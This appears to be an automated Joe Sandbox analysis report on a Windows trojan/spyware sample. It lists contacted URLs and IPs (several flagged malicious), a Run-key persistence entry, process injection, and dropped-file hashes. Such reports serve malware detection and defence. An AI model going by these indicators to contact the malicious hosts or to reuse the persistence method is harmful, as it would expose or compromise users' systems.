            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF7Miexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.msn.com/?ocid=iehp;9NKIdiexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbhttps://vid.newsweek.com/fani-willis-niexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.883831.com/gy14/www.mosaica.onlineiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://search.msn.co.jp/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW#eiexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://list.taobao.com/browse/search_visual.htm?n=15&q=iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://recherche.tf1.fr/favicon.icoQjiexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.biosif.comiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.pchome.com.tw/favicon.icoiexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.mtdiyx.xyz/gy14/www.169cc.xyzexplorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngo$iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://browser.events.data.msn.com/iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://search.yahoo.co.jp/favicon.icoiexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://msn.com/om/niexplore.exe, 0000000E.00000002.4184443900.0000000006AD9000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.msn.com/?ocid=iehp.icoaiexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.buflitr.comiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.soso.com/iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://search.cn.yahoo.com/2riexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://code.jquery.com/Aiexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngGZiexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://busca.orange.es/iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.twitter.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmp, msapplication.xml6.13.drfalse
            • URL Reputation: safe
            unknown
            http://www.target.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.rd.com/list/tsa-rules-can-cant-pack-in-carry-on/iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7D&Form=IE8SRCiexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.kkbox.com.tw/favicon.icoUxiexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://code.jquery.com/Qiexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDjX-dark49tiexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.camelpmkrf.comexplorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://sb.scorecardresearch.com/b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.miexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4186383756.0000000006B27000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngiexplore.exe, 0000000E.00000002.4225595480.000000000B858000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4210548565.000000000ADEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://c.microsoftstart.com/c.gifiexplore.exe, 0000000E.00000002.4210835737.000000000AE17000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4223084652.000000000AC8C000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://service2.bfast.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://browser.events.data.msn.com/liexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.news.com.au/favicon.icoiexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.tiscali.it/favicon.icoiexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://it.search.yahoo.com/iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            13.107.246.40 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            38.174.75.236 | www.aicashu.com | United States | 174 | COGENT-174US | true
            151.101.130.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
            162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
            142.250.184.225 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
            172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
            66.29.149.193 | www.mtdiyx.xyz | United States | 19538 | ADVANTAGECOMUS | true
            151.101.1.108 | prod.appnexus.map.fastly.net | United States | 54113 | FASTLYUS | false
            23.43.85.133 | unknown | United States | 3257 | GTT-BACKBONEGTTDE | false
            142.250.80.74 | unknown | United States | 15169 | GOOGLEUS | false
            18.244.18.38 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
            239.255.255.250 | unknown | Reserved | unknown | unknown | false
            18.143.129.199 | www.qieqyt.xyz | United States | 16509 | AMAZON-02US | true
            3.33.130.190 | venitro.com | United States | 8987 | AMAZONEXPANSIONGB | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447829
            Start date and time:2024-05-27 08:41:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 13m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:37
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Sample name:#U0426#U0438#U0442#U0430#U0442#U0430.exe
            renamed because original name is a hash value
            Original Sample Name:.exe
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winEXE@322/289@33/14
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 57%
            • Number of executed functions: 177
            • Number of non-executed functions: 181
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 184.28.89.167, 13.107.42.16, 13.107.21.239, 204.79.197.239, 216.58.212.142, 204.79.197.203, 92.123.104.60, 92.123.104.63, 92.123.104.67, 92.123.104.62, 92.123.104.6, 92.123.104.66, 92.123.104.65, 92.123.104.64, 92.123.104.7, 23.43.62.58, 204.79.197.200, 2.16.164.17, 2.16.164.18, 2.16.164.113, 2.23.209.135, 2.23.209.183, 2.23.209.137, 2.23.209.179, 2.23.209.193, 2.23.209.187, 2.23.209.185, 2.23.209.132, 2.23.209.186, 2.23.209.56, 2.23.209.8, 2.23.209.57, 2.23.209.3, 2.23.209.5, 2.23.209.58, 2.23.209.4, 2.23.209.6, 2.23.209.2, 204.79.197.237, 13.107.21.237, 68.219.88.97, 20.189.173.13, 2.16.164.32, 2.16.164.88, 2.18.64.218, 2.18.64.203, 142.250.176.195, 172.217.165.131, 142.251.40.99, 142.251.40.131
            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, c-msn-com-nsatc.trafficmanager.net, e11290.dspg.akamaiedge.net, go.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, ieonline.microsoft.com, config.edge.skype.com, e28578.d.akamaiedge.net, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, assets.msn.com.edgekey.net, fs.microsoft.com, th.bing.com.edgekey.net, c-bing-com.dual-a-0034.a-msedge.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, www-msn-com.a-0003.a-msedge.net, edge.microsoft.com, fe3cr.delivery.mp.microsoft.com, a1834.dscg2.akamai.net, any.edge.bing.com, onedscolprdwus12.westus.cloudapp.azure.com, l-0007.config.sky
            • Execution Graph export aborted for target #U0426#U0438#U0442#U0430#U0442#U0430.exe, PID 7532 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes were analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Report size getting too big, too many NtSetValueKey calls found.
            • Report size getting too big, too many NtWriteVirtualMemory calls found.
            Time | Type | Description
            02:42:21 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
            02:42:31 | API Interceptor | 8698479x Sleep call for process: explorer.exe modified
            02:42:53 | API Interceptor | 8235904x Sleep call for process: mstsc.exe modified
            07:42:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run N2K8UFW C:\Program Files (x86)\Internet Explorer\iexplore.exe
            07:42:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run N2K8UFW C:\Program Files (x86)\Internet Explorer\iexplore.exe
            07:42:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
            07:42:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.0734211054359508
                                Encrypted:false
                                SSDEEP:384:xv6QoL68L6c2FuFPHj6e6wam8OzuiFmY4lO836C/:p6Qm6a6GFPHj6e6wa6zuiFmY4lO836
                                MD5:58B30DD74E2EE4CC4C7B48F52A5AC370
                                SHA1:822E7349C9708858A66D8C9D69A5DFF9EF9E95A6
                                SHA-256:E08C90B6841011590B7B283F1931AAFA6F5533D510FD76E39CD4C1692B8278E8
                                SHA-512:E02393DD193B61A4C80D3142686C6CBC2E4A3244C2996D1168028455695DB2C3AC03B1910E129F793BD19CE27DAE2CA667872B3028BD659E2BADE85F6A6EA855
                                Malicious:false
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Mini DuMP crash report, 16 streams, Mon May 27 06:42:07 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):455410
                                Entropy (8bit):3.467166328215764
                                Encrypted:false
                                SSDEEP:3072:0YgmcUAgwAsuP/UhclIB4sjcS4mn1CCqyPF5E3+vQtdN9tdN9tdN9td7G6/:/gpc7PnUdX3nqJ3Qv6
                                MD5:AFD6F7FD05156C78C43B810421D3C20F
                                SHA1:FBB13C47D0069BC54021E56E302D2926F443823F
                                SHA-256:760006B41B32D8340453F0B232F98BF1A7F1BD46C909A2033598FF189B263C2E
                                SHA-512:22DFB9FE7722DAC78D3281D4DDDB02B81B1CBEEC61E9A6BEB3F293FE4174D9B047ABCC34683AC3DF5B7A70054F813598E6BE15BBC7A6800D53DFA8095B4E0144
                                Malicious:false
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8718
                                Entropy (8bit):3.7171874406738916
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJe6hFsw6Y9JniJgmfZXUMprr89blbH+fcP/jm:R6lXJe6zj6YTniJgmfJ+lbefcX6
                                MD5:A5BF748C4CFCA78E17759F2778CC39D5
                                SHA1:ED298FD5630F5D884E3A55B915CAECD24250DE4F
                                SHA-256:060BB19FA710B97FE4BFC236090E7BDDBAA27F95258B60CBECC9D8DB74E496DD
                                SHA-512:327875CD8ADE7373D11A343A799A879428B38DF83DC6DEB3BF9D26C505A1EF4D7333C700DB1D0004B0E5E00C9F289B7A20CC7F33FCA5F214E435BCC9809DBFD9
                                Malicious:false
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4942
                                Entropy (8bit):4.602767907576402
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsnJg771I95mWpW8VYB7Ym8M4JyOE6FnHyq8vTOEaBXJA86d:uIjfJI7en7VBJWgWLaB5A86d
                                MD5:20EFDA9F514B638A6FB18D1AE11C18F1
                                SHA1:349DA5C7DC163FBC2002C823FC376C9888323077
                                SHA-256:C2BE716851CA3E23DF0DF13BF1C25D764AD38BBE4FED87694ACFE6564C2CD252
                                SHA-512:EAFAED8D2568228F6EDA5422929F9F08E4FC11F67426BC5A004E68CF0C5B5D615C28D36A10A543867F995DC24D4F2F973AC818C910CB929B68AD39510F257995
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="341144" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):126
                                Entropy (8bit):4.925892995934656
                                Encrypted:false
                                SSDEEP:3:D9yRtFwsSxzqC+eAsLE4YHFk6xWXaULzAqTUzXB9LKb:JUF+FqCqTPQXaULat9ub
                                MD5:515AB1A3E26D9F3BA041784C07431008
                                SHA1:DA905C7DF7CF69A297A2CB18C3399DAE8A5A0F6B
                                SHA-256:497A92BA77DBCC04527EB39380F64A44243BAEBA4A72DD726B4BD97D5DCE85C2
                                SHA-512:7138C6EEE0D640AE5A82412F0D94DC08EA1E4B5A66873E1EC453AE99C45FA22129CFD909D684B84D1D65A17F9231F0F8C19EE490CA09C56290F35A039992D435
                                Malicious:false
                                Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20240523.136&quot;}" ltime="333263184" htime="31109121" /></root>
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                Category:dropped
                                Size (bytes):4286
                                Entropy (8bit):3.8046022951415335
                                Encrypted:false
                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25002
                                Entropy (8bit):6.065991058495633
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6yX+iFlWuhuatPB:PMSzMtXijv7pFlDu65
                                MD5:67D0E0D9D7762D66BF060096200E3819
                                SHA1:8FEB51BE95E8A97BEE6A22E1ED2950ABEA6B9A75
                                SHA-256:E3052921E544982B441EB92201A2F60D887234CF8C86CE1C0CEB24538B6CAFA9
                                SHA-512:DB681E5C98C1F84FE480E30F16BECB3A068CEA8D685351E55E7327CAE87C5761E0157C643804E9EC57CF35D3B9EB319B348C538391B48DD5B37C974480393062
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):26032
                                Entropy (8bit):6.068092370471732
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXTQ+bCFlWuhuatPo:PMSzMtXijv7hCFlDu6A
                                MD5:52A518AE19743321FB0D485B83A640DC
                                SHA1:B5D9FBCE1714D293E0E715CFF8B69830E3742F7D
                                SHA-256:5EE1B6344189FE0D8F89E83725671DD19D894F4057CDA3C61EA54E1C0DA5090B
                                SHA-512:4104583AF54C36A0BC10D5EE0C76A9CE889ADBBC3B6652536C9D7AD8066DC4DAF566885D638140F2579844C881A05FD127C11D8BD1815FF8F1937AE89E2C4396
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
